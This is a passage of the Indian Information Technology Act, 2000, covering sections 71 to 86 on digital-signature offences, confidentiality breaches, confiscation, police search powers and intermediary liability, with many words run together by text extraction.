Whoevermakesanymisrepresentationto,orsuppressesanymaterialfactfrom,theControllerorthe Certifying
Authority for obtaining any license or Digital Signature Certificate, as the case may be. Shall be
punished with imprisonment for a term which may extend to two years, or with fine which may extend
to one lakh rupees, or with both.

72. Penalty for breach of confidentiality and privacy.

Save as otherwise provided in this Act or any other law for the time being in force, any person who,
inpursuanceofanyofthepowersconferredunderthisAct,rulesorregulationsmadethereunder,has secured
access to any electronic record, book, register, correspondence, information, document or other
material without the consent of the person concerned discloses such electronic record, book. Register,
correspondence, information, document or other material to any other person shall be punished with
imprisonment for a term which may extend to two years, or with fine which may extend to one lakh
rupees, or with both.

73. Penalty for publishing Digital Signature Certificate false in certain particulars.

(1) NopersonshallpublishaDigitalSignatureCertificateorotherwisemakeitavailabletoanyother person


with the knowledge that—

(a) The Certifying Authority listed in the certificate has not issued it; or

(b) The subscriber listed in the certificate has not accepted it; or

(c) The certificate has been revoked or suspended, unless such publication is for the purpose of
verifying a digital signature created prior to such suspension or revocation.
(2) Any person who contravenes the provisions of sub-section (1) shall be punished with
imprisonment for a term which may extend to two years, or with fine which may extend to one lakh
rupees, or with both.

74. Publication for fraudulent purpose.

Whoever knowingly creates, publishes or otherwise makes available a Digital Signature Certificate for
any fraudulent or unlawful purpose shall be punished with imprisonment for a term which may extend
to two years, or with fine which may extend to one lakh rupees, or with both.

75. Act to apply for offence or contravention committed outside India.

(1) Subject to the provisions of sub-section (2), the provisions of this Act shall apply also to any
offence or contravention committed outside India by any person irrespective of his nationality.

(2) Forthepurposesofsub-section(1),thisActshallapplytoanoffenceorcontraventioncommitted outside


India by any person if the act or conduct constituting the offence or contravention involves computer,
computer system or computer network located in India.

76. Confiscation.

Anycomputer,computersystem,floppies,compactdisks,tapedrivesoranyotheraccessoriesrelated thereto,
in respect of which any provision of this Act. rules, orders or regulations made thereunder
hasbeenorisbeingcontravened,shallbeliabletoconfiscation:Providedthatwhereitisestablished to the
satisfaction of the court adjudicating the confiscation that the person in whose possession,
powerorcontrolofanysuchcomputer,computersystem,floppies,compactdisks,tapedrivesorany other
accessories relating thereto is found is not responsible for the contravention of the provisions of this
Act, rules, orders or regulations made thereunder, the court may, instead of making an order
forconfiscationofsuchcomputer,computersystem,floppies,compactdisks,tapedrivesoranyother
accessories related thereto, make such other order authorized by this Act against the person
contravening of the provisions of this Act, rules, orders or regulations made thereunder as it may think
fit.
77. Penalties or confiscation not to interfere with other punishments.

No penalty imposed or confiscation made under this Act shall prevent the imposition of any other
punishment to which the person affected thereby is liable under any other law for the time being in
force.

78. Power to investigate offences.

Notwithstanding anything contained in the Code of Criminal Procedure, 1973, a police officer not
below the rank of Deputy Superintendent of Police shall investigate any offence under this Act.

NETWORK SERVICE PROVIDERS NOT TO BE LIABLE IN CERTAIN CASES

79. Network service providers not to be liable in certain cases.

For the removal of doubts, it is hereby declared that no person providing any service as a network
service provider shall be liable under this Act, rules or regulations made thereunder for any third party
information or data made available by him if he proves that the offence or contravention was
committed without his knowledge or that he had exercised all due diligence to prevent the commission
of such offence or contravention.

Explanation.—for the purposes of this section, —

(a) "Network service provider" means an intermediary;

(b) "Third party information" means any information dealt with by a network service provider in his
capacity as an intermediary;

80. Power of police officer and other officers to enter, searched.

(1) NotwithstandinganythingcontainedintheCodeofCriminalProcedure,1973,anypoliceofficer, not


below the rank of a Deputy Superintendent of Police, or any other officer of the Central Government or
a State Government authorized by the Central Government in this behalf may enter any public place
and search and arrest without warrant any person found therein who is reasonably suspected or having
committed or of committing or of being about to commit any offence under this
Act Explanation.—For the purposes of this sub-section, the expression "public place" includes any
public conveyance, any hotel, any shop or any other place intended for use by, or accessible to the
public.

(2) Where any person is arrested under sub-section (1) by an officer other than a police officer, such
officer shall, without unnecessary delay, take or send the person arrested before a magistrate having
jurisdiction in the case or before the officer-in-charge of a police station.

(3) The provisions of the Code of Criminal Procedure, 1973 shall, subject to the provisions of this
section, apply, so far as may be, in relation to any entry, search or arrest, made under this section.

81. Act to have overriding effect.

The provisions of this Act shall have effect notwithstanding anything inconsistent therewith contained
in any other law for the time being in force.

82. Controller, Deputy Controller and Assistant Controllers to be public servants.

ThePresidingOfficerandotherofficersandemployeesofaCyberAppellateTribunal,theController, the
Deputy Controller and the Assistant Controllers shall be deemed to be public servants within the
meaning of section 21 of the Indian Penal Code.

83. Power to give directions.

The Central Government may give directions to any State Government as to the carrying into
execution in the State of any of the provisions of this Act or of any rule, regulation or order made
thereunder.

84. Protection of action taken in good faith.

No suit, prosecution or other legal proceeding shall lie against the Central Government, the State
Government,theControlleroranypersonactingonbehalfofhim,thePresidingOfficer,adjudicating officers
and the staff of the Cyber Appellate Tribunal for anything which is in good faith done or intended to be
done in pursuance of this Act or any rule, regulation or order made thereunder.
85. Offences by companies.

(1) Where a person committing a contravention of any of the provisions of this Act or of any rule,
direction or order made thereunder is a company, every person who, at the time the contravention was
committed, was in charge of, and was responsible to, the company for the conduct of business of the
company as well as the company, shall be guilty of the contravention and shall be liable to be
proceeded against and punished accordingly:

Providedthatnothingcontainedinthissub-sectionshallrenderanysuchpersonliabletopunishment if he
proves that the contravention took place without his knowledge or that he exercised all due diligence to
prevent such contravention.

(2) Notwithstanding anything contained in sub-section (1), where a contravention of any of the
provisions of this Act or of any rule, direction or order made thereunder has been committed by a
company and it is proved that the contravention has taken place with the consent or connivance of,
orisattributabletoanyneglectonthepartof,anydirector,manager,secretaryorotherofficerofthe company,
such director, manager, secretary or other officer shall also be deemed to be guilty of the contravention
and shall be liable to be proceeded against and punished accordingly.

Explanation. —for the purposes of this section, —

(i) "Company" means anybody corporate and includes a firm or other association of individuals; and

(ii) "Director", in relation to a firm, means a partner in the firm.

86. Removal of difficulties.

(1)IfanydifficultyarisesingivingeffecttotheprovisionsofthisAct,theCentralGovernmentmay,
byorderpublishedintheOfficialGazette,makesuchprovisionsnotinconsistentwiththeprovisions of this Act
as appear to it to be necessary or expedient for removing the difficulty:

Providedthatnoordershallbemadeunderthissectionaftertheexpiryofaperiodoftwoyearsfrom the
commencement of this Act (2) Every order made under this section shall be laid, as soon as may be
after it is made, before each House ofParliament.

You might also like